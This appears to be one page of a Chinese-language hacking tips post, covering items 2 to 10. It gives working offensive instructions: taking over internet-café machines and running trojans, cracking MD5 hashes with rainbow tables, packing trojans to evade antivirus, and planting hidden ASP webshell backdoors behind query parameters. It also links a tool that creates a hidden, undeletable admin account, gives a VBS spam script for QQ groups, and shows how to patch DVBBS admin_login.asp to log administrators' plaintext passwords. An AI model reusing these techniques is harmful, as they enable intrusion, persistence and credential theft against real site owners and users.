2. 名称：整蛊网吧

    先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。

    3．名称：感受MD5暴力破解的魅力
    rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"1和7代表密码最小和最大长度
阿汀我再加个方法：http://md5.rednoize.com/ 在线破解或者到http://www.md5lookup.com/?category=01-3&searck=on

    4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件。

    5．名称：隐蔽的插入型ASP木马 

(1)在我们要做手脚的asp文件里加入如下内容

以下是代码片段： <%if request("action")="ok" then%>

shell代码插在这里，最好是小马，还要加密一下

以下是代码片段： <%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法，在我们要做手脚的asp文件里加入如下内容

以下是代码片段： <% on error resume next strFileName = Request.QueryString("filer") set objStream = Server.createObject("ABODB.Stream") objStream.Type = 1 objStream.Open objStream.LoadFromFile strFileName objStream.SaveToFile Server.mappath("ating.asp"),2 %>

    访问的时候在做手脚的asp文件后面加上?filer=XXX ，XXX为你本地上传的一个路径如 c:ating123.asp上传后在做手脚的asp的同文件夹中有ating,asp。

（3）前提得到system权限，

进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可

     6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar，此工具在该电脑生成一个超级用户 用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的

    7．名称：QQ群脚本攻击

    打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可

以下是引用片段： Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next

    8．搜索：程序制作：万鹏 有免费申请空间的，直接上传asp马即可

    9. 名称：全面找出你站上的ASP木马

（1） 用杀毒软件
（2） 用FTP客户端软件，点"工具"->"比较文件夹"
（3） 用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马
（4） 用工具Beyond Compare

  10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画

（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码 
在"username=trim(replace(request("username")这行后面 
Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
只要管理员登陆后台，在目录下就生成了laner.txt

[1] [2] [3] 下一页